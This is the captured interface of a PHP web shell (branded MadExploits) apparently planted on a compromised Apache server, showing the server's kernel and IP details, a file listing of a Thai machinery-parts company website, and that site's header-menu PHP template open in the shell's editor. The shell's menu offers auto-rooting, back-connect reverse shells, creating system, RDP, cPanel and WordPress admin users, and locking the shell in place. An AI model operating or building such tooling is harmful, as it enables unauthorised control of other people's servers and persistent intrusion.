Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.222.183.63
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2024 /
pjmachinerypart.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
api
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
css2
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
js2
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
vendors
[ DIR ]
drwxr-xr-x
1Head.php
5.45
KB
-rwxr-xr-x
2HeadMenu - Copy.php
11.01
KB
-rwxr-xr-x
2HeadMenu.php
12.77
KB
-rwxr-xr-x
2banner.php
4.95
KB
-rwxr-xr-x
3Footer.php
13.11
KB
-rwxr-xr-x
4End.php
1.1
KB
-rwxr-xr-x
BBservice.php
3.2
KB
-rwxr-xr-x
Category_Machine.php
6.3
KB
-rwxr-xr-x
about_us.php
4.36
KB
-rwxr-xr-x
category.php
9.26
KB
-rwxr-xr-x
contact.php
3.87
KB
-rwxr-xr-x
detail.php
16.75
KB
-rwxr-xr-x
index.php
181
B
-rwxr-xr-x
portfolio.php
3.41
KB
-rwxr-xr-x
product.php
7.66
KB
-rwxr-xr-x
product_detail.php
9.74
KB
-rwxr-xr-x
service.php
3.51
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 2HeadMenu.php
<style> .header-bottom-list>li { position: relative; text-align: center; margin-left: auto; margin-right: auto; } .li_index1:hover { background: #1c6bc1; } .ht-dropdown { padding: 4%; } .header-bottom-list > li.active > a, .header-bottom-list > li:hover > a { color: #000000; } </style> <header class="header-style-four"> <div class="header-top" style="padding: 5px;background: #0048ab;"> <div class="container-fluid"> <div class="row align-items-center"> <div class="col-lg-5"> </div> <div class="col-lg-2"> <!-- Logo Start Here --> <div class="logo text-center"> <a href="index.php"> <img src="img/PJ_Logo_2.png" alt="logo-image" style="width: 120px;"> </a> </div> <!-- Logo End Here --> </div> <div class="col-lg-5"> </div> </div> </div> <!-- Container End --> </div> <!-- Header Middle Start Here --> <div class="header-middle stick header-sticky" style="background: #dddfe0;"> <div style="margin-right: 50px;margin-left: 50px;"> <div class="row align-items-center"> <div class="col-xl-12 col-lg-12 d-none d-lg-block"> <nav> <ul class="header-bottom-list d-flex"> <li> <a href="index.php">หน้าแรก</a> </li> <?PHP $SQL_Category = " SELECT product_category.ProductCategory_ID, product_category.ProductCategory_Name, product_category.StatusProductCategory_ID, status_productcategory.StatusProductCategory_Name, product_category.ProductCategory_img , product_category.ProductCategory_ahref_name , product_category.ProductCategory_ahref_status , product_category.ProductCategory_Sort FROM status_productcategory INNER JOIN product_category ON status_productcategory.StatusProductCategory_ID = product_category.StatusProductCategory_ID WHERE product_category.StatusProductCategory_ID = 1 ORDER BY product_category.ProductCategory_Sort "; $objQuery_Category = $objConnect->query($SQL_Category); while ($objResult_category = mysqli_fetch_array($objQuery_Category)) { $ProductCategoryID = $objResult_category["ProductCategory_ID"]; $ProductCategoryName = $objResult_category["ProductCategory_Name"]; $ProductCategory1_ahref_name = $objResult_category["ProductCategory_ahref_name"]; $ProductCategory1_ahref_status = $objResult_category["ProductCategory_ahref_status"]; $SQL_Category2 = " SELECT product_category.ProductCategory_ID, product_category.ProductCategory_Name, product_category.StatusProductCategory_ID, product_category2.ProductCategory2_ID, product_category2.StatusProductCategory2_ID, product_category2.ProductCategory2_ahref_name , product_category2.ProductCategory2_ahref_status, product_category2.ProductCategory2_Name , product_category.ProductCategory_Sort FROM product_category2 INNER JOIN product_category ON product_category2.ProductCategory_ID = product_category.ProductCategory_ID WHERE product_category2.StatusProductCategory2_ID = 1 AND product_category.ProductCategory_ID = $ProductCategoryID ORDER BY product_category.ProductCategory_Sort "; $objQuery_Category2 = $objConnect->query($SQL_Category2); ?> <?PHP if ($ProductCategory1_ahref_status == 2) { $chk_ahref_status = $ProductCategory1_ahref_name; } else { $chk_ahref_status = "product.php?c1=" . $ProductCategoryID; } ?> <li> <a class="drop-icon" href="<?= $chk_ahref_status; ?>"><?= $ProductCategoryName; ?></a> <ul class="ht-dropdown" style="height: fit-content;"> <?PHP while ($objResult_category2 = mysqli_fetch_array($objQuery_Category2)) { $ProductCategoryID = $objResult_category2["ProductCategory_ID"]; $ProductCategoryID2 = $objResult_category2["ProductCategory2_ID"]; $ProductCategoryName2 = $objResult_category2["ProductCategory2_Name"]; $ProductCategory2_ahref_name = $objResult_category2["ProductCategory2_ahref_name"]; $ProductCategory2_ahref_status = $objResult_category2["ProductCategory2_ahref_status"]; if ($ProductCategory2_ahref_status == 2) { $chk_ahref_status = $ProductCategory2_ahref_name; } else { $chk_ahref_status = "category.php?c1=" . $ProductCategoryID . "&c2=" . $ProductCategoryID2; } ?> <li class="li_index1"> <a href="<?= $chk_ahref_status; ?>" style="color: #fff;"> <?= $ProductCategoryName2; ?></a> </li> <?PHP } ?> </ul> </li> <?PHP } ?> <li> <a href="contact.php">ติดต่อเรา</a> </li> </ul> </nav> </div> </div> <!-- Row End --> <!-- Mobile Menu Start Here --> <div class="mobile-menu d-block d-lg-none"> <nav> <ul> <li> <a href="index.php">หน้าแรก</a> </li> <?PHP $SQL_Category = " SELECT product_category.ProductCategory_ID, product_category.ProductCategory_Name, product_category.StatusProductCategory_ID, status_productcategory.StatusProductCategory_Name, product_category.ProductCategory_img , product_category.ProductCategory_ahref_name , product_category.ProductCategory_ahref_status FROM status_productcategory INNER JOIN product_category ON status_productcategory.StatusProductCategory_ID = product_category.StatusProductCategory_ID WHERE product_category.StatusProductCategory_ID = 1 ORDER BY product_category.ProductCategory_Sort "; $objQuery_Category = $objConnect->query($SQL_Category); while ($objResult_category = mysqli_fetch_array($objQuery_Category)) { $ProductCategoryID = $objResult_category["ProductCategory_ID"]; $ProductCategoryName = $objResult_category["ProductCategory_Name"]; $ProductCategory1_ahref_name = $objResult_category["ProductCategory_ahref_name"]; $ProductCategory1_ahref_status = $objResult_category["ProductCategory_ahref_status"]; $SQL_Category2 = " SELECT product_category.ProductCategory_ID, product_category.ProductCategory_Name, product_category.StatusProductCategory_ID, product_category2.ProductCategory2_ID, product_category2.StatusProductCategory2_ID, product_category2.ProductCategory2_ahref_name , product_category2.ProductCategory2_ahref_status, product_category2.ProductCategory2_Name FROM product_category2 INNER JOIN product_category ON product_category2.ProductCategory_ID = product_category.ProductCategory_ID WHERE product_category2.StatusProductCategory2_ID = 1 AND product_category.ProductCategory_ID = $ProductCategoryID ORDER BY product_category.ProductCategory_Sort "; $objQuery_Category2 = $objConnect->query($SQL_Category2); ?> <?PHP if ($ProductCategory1_ahref_status == 2) { $chk_ahref_status = $ProductCategory1_ahref_name; } else { $chk_ahref_status = "product.php?c1=" . $ProductCategoryID; } ?> <li> <a href="<?= $chk_ahref_status; ?>"><?= $ProductCategoryName; ?></a> <ul> <?PHP while ($objResult_category2 = mysqli_fetch_array($objQuery_Category2)) { $ProductCategoryID = $objResult_category2["ProductCategory_ID"]; $ProductCategoryID2 = $objResult_category2["ProductCategory2_ID"]; $ProductCategoryName2 = $objResult_category2["ProductCategory2_Name"]; $ProductCategory2_ahref_name = $objResult_category2["ProductCategory2_ahref_name"]; $ProductCategory2_ahref_status = $objResult_category2["ProductCategory2_ahref_status"]; if ($ProductCategory2_ahref_status == 2) { $chk_ahref_status = $ProductCategory2_ahref_name; } else { $chk_ahref_status = "category.php?c1=" . $ProductCategoryID . "&c2=" . $ProductCategoryID2; } ?> <li> <a href="<?= $chk_ahref_status; ?>">- <?= $ProductCategoryName2; ?></a> </li> <?PHP } ?> </ul> </li> <?PHP } ?> <li> <a href="contact_us.php">ติดต่อเรา</a> </li> </ul> </nav> </div> <!-- Mobile Menu End Here --> </div> <!-- Container End --> </div> <!-- Header Middle End Here --> </header>
Close